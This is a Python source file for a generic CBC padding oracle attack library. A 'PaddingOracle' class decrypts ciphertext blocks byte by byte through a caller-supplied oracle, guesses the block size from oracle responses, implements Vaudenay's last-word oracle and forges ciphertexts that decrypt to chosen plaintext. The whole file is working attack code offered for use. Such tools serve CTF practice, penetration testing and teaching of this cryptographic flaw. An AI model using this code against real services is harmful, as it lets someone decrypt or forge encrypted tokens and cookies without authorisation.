#!/usr/bin/python
from base64 import b64encode, b64decode, urlsafe_b64encode, urlsafe_b64decode
from binascii import hexlify, unhexlify
from copy import deepcopy
import logging
import random
from functools import reduce
import sys


class Encoding:
    '''
    Encoding Enum - how ciphertexts are passed in to, and returned from,
    PaddingOracle.
    '''
    b64 = 1      # standard base64
    b64_web = 2  # URL-safe base64 ('-' and '_' instead of '+' and '/')
    hex = 3      # hex string
    raw = 5      # raw bytes, passed through


class PaddingOracle(object):
    '''
    Generic code to attack CBC padding oracles.

    The ciphertext is split into blocks of BS bytes. The first block is
    treated as the IV and cannot be decrypted. The user-supplied oracle is a
    callable that receives a bytes-like ciphertext and returns True when its
    padding is valid, and False on a padding error.
    '''

    def __init__(self, ciphertext, BS=None, verbosity=1, encoding=Encoding.b64, oracle=None):
        '''
        ciphertext -- the ciphertext, encoded as described by ``encoding``
        BS         -- blocksize in bytes; guessed through the oracle if None
        verbosity  -- 0 = warnings only, 1 = INFO, 2 = DEBUG
        encoding   -- an Encoding value, used for input and for forged output
        oracle     -- padding oracle callable (see class docstring)

        Raises Exception if the ciphertext length is not a multiple of BS,
        or if BS has to be guessed and no oracle is set.
        '''
        # setup logging - default
        self.set_verbosity(verbosity)
        # init class variables
        self.encoding = encoding
        self.oracle_func = oracle
        self.analyse_func = None  # not used by the code in this class; kept for callers
        # decode the initial ciphertext into raw bytes
        self.ct = self.decode(ciphertext)
        # if no BS is given, determine the BS via the oracle
        if BS is None:
            self.BS = self.get_blocksize(self.ct)
        else:
            self.BS = BS
        self.num_blocks = self._ct_init()
        self.blocks = self.split_blocks(self.ct)
        self._outmode = "hex"
        # cracked intermediate / plaintext blocks as dict {index: block}
        self.it_blocks = {}
        self.pt_blocks = {}

    def decode(self, ciphertext):
        '''
        Decode ``ciphertext`` according to self.encoding into raw bytes,
        the form in which the ciphertext is processed internally.

        b64_web is URL-safe base64; missing '=' padding is tolerated.
        Any other encoding (raw) returns the input as bytes; a str is
        encoded as latin-1, so each character maps to one byte.
        '''
        if self.encoding == Encoding.b64:
            return b64decode(ciphertext)
        if self.encoding == Encoding.hex:
            return unhexlify(ciphertext)
        if self.encoding == Encoding.b64_web:
            # web tokens frequently drop the trailing '=' padding
            pad = b'=' if isinstance(ciphertext, bytes) else '='
            return urlsafe_b64decode(ciphertext + pad * (-len(ciphertext) % 4))
        if isinstance(ciphertext, (bytes, bytearray)):
            return bytes(ciphertext)
        return ciphertext.encode('latin-1')

    def encode(self, ciphertext):
        '''
        Encode raw ciphertext bytes with self.encoding, so that output is
        returned in the same fashion as the input was given.
        Raw encoding returns the value unchanged.
        '''
        if self.encoding == Encoding.b64:
            return b64encode(ciphertext)
        if self.encoding == Encoding.hex:
            return hexlify(ciphertext)
        if self.encoding == Encoding.b64_web:
            return urlsafe_b64encode(ciphertext)
        return ciphertext

    def _ct_init(self):
        '''
        Run simple length checks and return the number of blocks.
        Raises Exception if the length is not a multiple of BS.
        '''
        if len(self.ct) % self.BS != 0:
            raise Exception("[-] Length not a multiple of the BS")
        return len(self.ct) // self.BS  # integer division (int on py2 and py3)

    def split_blocks(self, ct):
        '''Split the ciphertext into BS-sized bytearray blocks.'''
        return [bytearray(ct[i:i + self.BS]) for i in range(0, len(ct), self.BS)]

    def merge_blocks(self, blocks):
        '''Concatenate the blocks and return the ciphertext as a bytearray.'''
        out = bytearray()
        for ba in blocks:
            out.extend(ba)
        return out

    def last_word_oracle(self, y):
        '''
        Vaudenay's "last word oracle": recover the trailing intermediate
        bytes D(y) of the single ciphertext block ``y``.

        A random block r is prepended to y. The last byte of r is varied
        until the oracle accepts r|y. The padding length n is then found by
        flipping the bytes of r from the front. The oracle is queried with
        two-block messages r|y.

        Returns a bytearray with the last n bytes of D(y), where n >= 1.
        Raises Exception if no oracle is set, if y is not one block long, or
        if the oracle never accepts any padding.
        '''
        if self.oracle_func is None:
            raise Exception("[-] No Oracle function set!")
        y = bytearray(y)
        if len(y) != self.BS:
            raise Exception("[-] y must be exactly one block")
        r = bytearray(random.randint(0x00, 0xff) for _ in range(self.BS))
        r_b = r[-1]
        for i in range(256):
            r[-1] = r_b ^ i
            if self.oracle_func(self.merge_blocks([r, y])):
                break
        else:
            raise Exception("[-] Oracle never reported a valid padding")
        # r|y has a valid padding of unknown length; locate its first byte
        for n in range(self.BS, 1, -1):
            probe = bytearray(r)
            probe[self.BS - n] ^= 1
            if not self.oracle_func(self.merge_blocks([probe, y])):
                # byte BS-n belongs to the padding, so the last n bytes decrypt to n
                return bytearray(b ^ n for b in r[self.BS - n:])
        return bytearray([r[-1] ^ 1])

    def _is_single_byte_padding(self, blocks, byte_index):
        '''
        Confirm that a padding accepted while guessing the last byte is 0x01.

        This flips a bit in the byte before ``byte_index`` of the
        second-to-last block. A longer padding (0x02 0x02, ...) would then
        fail, while 0x01 still passes. The byte is restored afterwards.
        '''
        if byte_index == 0:
            return True
        pre_ct = blocks[-2]
        pre_ct[byte_index - 1] ^= 1
        try:
            return bool(self.oracle_func(self.merge_blocks(blocks)))
        finally:
            pre_ct[byte_index - 1] ^= 1

    def crack_last_block(self, blocks):
        '''
        Decrypt the last block of ``blocks`` through the padding oracle.

        bool oracle(ct) - should return True if ct is correct and False if
        padding error.

        ``blocks`` is a list of at least two ciphertext blocks. The
        second-to-last block is manipulated byte by byte, starting with the
        last byte, and the whole modified list is sent to the oracle. The
        caller's blocks are not modified.

        Returns (it_block, pt_block) as lists of ints: the intermediate
        bytes of the last block, and the plaintext (intermediate xor the
        original second-to-last block).

        Raises Exception if no oracle is set, if fewer than two blocks are
        given, or if no byte value yields a valid padding.
        '''
        if self.oracle_func is None:
            raise Exception("[-] No Oracle function set!")
        if len(blocks) < 2:
            raise Exception("[-] Need at least two blocks to crack the last one")
        blocks = [bytearray(b) for b in blocks]  # private copies
        bs = self.BS
        pt_block = [0] * bs  # plaintext block
        it_block = [0] * bs  # intermediate block
        orig_pre_ct = bytearray(blocks[-2])
        pre_ct = blocks[-2]  # second-to-last block - modified in place, part of `blocks`

        # byte_index is counting backwards in the second-to-last block
        for byte_index in range(bs - 1, -1, -1):
            padding = bs - byte_index
            # make the already-recovered trailing bytes decrypt to `padding`
            for prev_byte_index in range(bs - 1, byte_index, -1):
                pre_ct[prev_byte_index] = it_block[prev_byte_index] ^ padding
            for guess in range(256):
                pre_ct[byte_index] = guess
                if not self.oracle_func(self.merge_blocks(blocks)):
                    continue
                # for the last byte, a hit may be a longer padding (e.g. the
                # original one); later bytes are pinned and cannot be ambiguous
                if padding == 1 and not self._is_single_byte_padding(blocks, byte_index):
                    continue
                it_block[byte_index] = guess ^ padding
                pt_block[byte_index] = it_block[byte_index] ^ orig_pre_ct[byte_index]
                logging.debug("[~] correct padding [{0}] with byte [{1}]\n\t-> it_byte = {0} ^ {1} = {3}\n\t-> pt_byte = it_byte ^ {2} = {4}\n".format(
                    hex(padding), hex(guess), hex(orig_pre_ct[byte_index]),
                    hex(it_block[byte_index]), hex(pt_block[byte_index])))
                logging.debug("[+] Plaintext Block: {}".format(pt_block))
                break
            else:
                raise Exception("[-] No valid padding found for byte %d" % byte_index)
        return it_block, pt_block

    def print_ct_blocks(self):
        '''Print the ciphertext blocks as a hexdump, one block per line.'''
        print("[~] ciphertext as blockwise hexdump")
        ch_arr = self.bytes_to_string(self.merge_blocks(self.blocks))
        print(self.hexdump(ch_arr, length=self.BS))

    def bytes_to_string(self, inp):
        '''Convert an iterable of byte values (ints) to a str, one char per byte.'''
        return "".join([chr(p) for p in inp])

    def change_block(self, new_plaintext):
        '''
        Forge a ciphertext whose plaintext starts with ``new_plaintext``.

        ``new_plaintext`` is bytes, a bytearray or a str (a str is encoded
        as latin-1). Its length must be a multiple of BS. It is aligned with
        the ciphertext blocks:
          - its first block sits at the IV position (block 0) and is ignored;
          - block i (i >= 1) becomes the plaintext of ciphertext block i;
          - ciphertext blocks after it keep their original plaintext.

        Working from the last replaced block towards the IV, each preceding
        ciphertext block is rewritten so that the block decrypts to the
        wanted plaintext. The intermediate of each rewritten block is
        recovered through the oracle.

        Returns the forged ciphertext, encoded with self.encoding.
        Raises Exception on a bad length or a too-long plaintext.
        '''
        if not isinstance(new_plaintext, (bytes, bytearray)):
            new_plaintext = new_plaintext.encode('latin-1')
        if len(new_plaintext) % self.BS != 0:
            raise Exception("[-] new plaintext should be a multiple of the blocksize")
        new_blocks = self.split_blocks(new_plaintext)
        num_new_blocks = len(new_blocks)
        if num_new_blocks > len(self.blocks):
            raise Exception("[-] Plaintext is too long")
        local_blocks = [bytearray(b) for b in self.blocks]
        for idx in range(num_new_blocks - 1, 0, -1):
            logging.info("[*] changing index %d" % idx)
            # The last replaced block is still the original ciphertext, so an
            # intermediate cracked earlier can be reused. Every other block
            # was rewritten by the previous iteration and must be cracked.
            it_block = self.it_blocks.get(idx) if idx == num_new_blocks - 1 else None
            if it_block is None:
                it_block = self.get_it_block(idx, local_blocks)
            local_blocks[idx - 1] = bytearray(p ^ i for p, i in zip(new_blocks[idx], it_block))
        return self.encode(bytes(self.merge_blocks(local_blocks)))

    def _crack_index(self, index, ct_blocks):
        '''Validate ``index`` and crack block ``index`` of ``ct_blocks``; returns (it_block, pt_block).'''
        if not index:
            raise Exception("[-] Cannot decrypt the first block")
        if not 0 < index < len(ct_blocks):
            raise Exception("[-] Block index %d out of range" % index)
        return self.crack_last_block(ct_blocks[:index + 1])

    def get_it_block(self, index, ct_blocks):
        '''
        Return the intermediate block of ``ct_blocks[index]``, where
        index is in {1, .., len-1}. Raises Exception for any other index.
        '''
        it_block, _ = self._crack_index(index, ct_blocks)
        return it_block

    def crack_block(self, index):
        '''
        Crack the ciphertext block at ``index``, where index is in
        {1, .., len-1}.

        Stores the results in self.it_blocks / self.pt_blocks, prints the
        plaintext and returns it as bytes.
        Raises Exception for index 0 or an index out of range.
        '''
        it_block, pt_block = self._crack_index(index, self.blocks)
        self.it_blocks[index] = it_block
        self.pt_blocks[index] = pt_block
        logging.info("\n[+] decrypted block [%d]\n" % (index))
        self._output(pt_block)
        return bytes(bytearray(pt_block))

    def _output(self, pt_block):
        '''
        Universal function to print plaintext.

        Mode "hex" prints a hexdump and mode "str" prints the raw string;
        any other mode prints only the header.
        '''
        print("-----[ Plaintext ]-----")
        if self._outmode == "hex":
            print(self.hexdump(self.bytes_to_string(pt_block)))
        elif self._outmode == "str":
            print(self.bytes_to_string(pt_block))

    def set_output(self, mode):
        '''Set the output mode ("hex" or "str") for printing the plaintext.'''
        self._outmode = mode

    def set_verbosity(self, level):
        '''
        Set the verbosity for the different outputs:
        0 = warnings only, 1 = INFO, 2 = DEBUG (unknown values mean INFO).

        logging.basicConfig() does nothing once the root logger has
        handlers, so the level is also set explicitly for later calls.
        '''
        levels = {0: logging.WARNING, 1: logging.INFO, 2: logging.DEBUG}
        log_level = levels.get(level, logging.INFO)
        logging.basicConfig(format='%(message)s', level=log_level)
        logging.getLogger().setLevel(log_level)

    def decrypt_block_at_index(self, index):
        '''Crack the block at ``index`` (see crack_block); returns its plaintext.'''
        logging.info("[+] Decrypting block at index %d" % index)
        return self.crack_block(index)

    def decrypt_all_blocks(self):
        '''
        Crack all blocks of the ciphertext except the first one, from the
        last block to the second.

        Stores results in self.it_blocks / self.pt_blocks and prints the
        joined plaintext. Returns the plaintext as bytes, which is b'' for a
        single-block ciphertext.
        '''
        num_blocks = len(self.blocks)
        pt_blocks = []
        logging.info("[+] Decrypting all %d blocks" % num_blocks)
        for idx in range(num_blocks, 1, -1):
            logging.info("[*] Decrypting block %d" % (idx))
            it_block, pt_block = self._crack_index(idx - 1, self.blocks)
            pt_blocks.append(pt_block)
            self.it_blocks[idx - 1] = it_block
            self.pt_blocks[idx - 1] = pt_block
        pt = bytearray()
        for pt_block in reversed(pt_blocks):
            pt.extend(pt_block)
        logging.info("\n[+] decrypted all the blocks\n")
        self._output(pt)
        return bytes(pt)

    def get_blocksize(self, ciphertext):
        '''
        Guess the blocksize (8 or 16) via the oracle, as described in
        'Practical Padding Oracle Attacks' by T. Duong & J. Rizzo.

        A length of 8 mod 16 can only come from an 8-byte cipher.
        Otherwise the last 16 bytes are appended to the ciphertext:
          - with an 8-byte cipher they are two whole blocks, which reproduce
            the original last block and its predecessor, so the padding
            stays valid;
          - with a 16-byte cipher the last block is decrypted against
            itself, which usually gives an invalid padding.
        '''
        if self.oracle_func is None:
            raise Exception('Error: Not oracle set!')
        if len(ciphertext) % 16 == 8:
            return 8
        last_16 = ciphertext[-16:]
        if self.oracle_func(ciphertext + last_16):
            return 8
        return 16

    def hexdump(self, src, length=16):
        '''
        Return a hexdump (offset, hex bytes, printable ASCII) of ``src``.

        ``src`` is bytes/bytearray (each byte maps to one character) or any
        object, which is converted with str().
        Based on https://gist.github.com/sbz/1080258
        '''
        if isinstance(src, (bytes, bytearray)):
            src = bytes(src).decode('latin-1')  # avoid dumping the b'...' repr
        else:
            src = str(src)
        printable_table = ''.join([chr(x) if len(repr(chr(x))) == 3 else '.' for x in range(256)])
        lines = []
        for offset in range(0, len(src), length):
            chars = src[offset:offset + length]
            hex_part = ' '.join(["%02x" % ord(ch) for ch in chars])
            printable = ''.join([printable_table[ord(ch)] if ord(ch) <= 127 else '.' for ch in chars])
            lines.append("%04x %-*s %s\n" % (offset, length * 3, hex_part, printable))
        return ''.join(lines)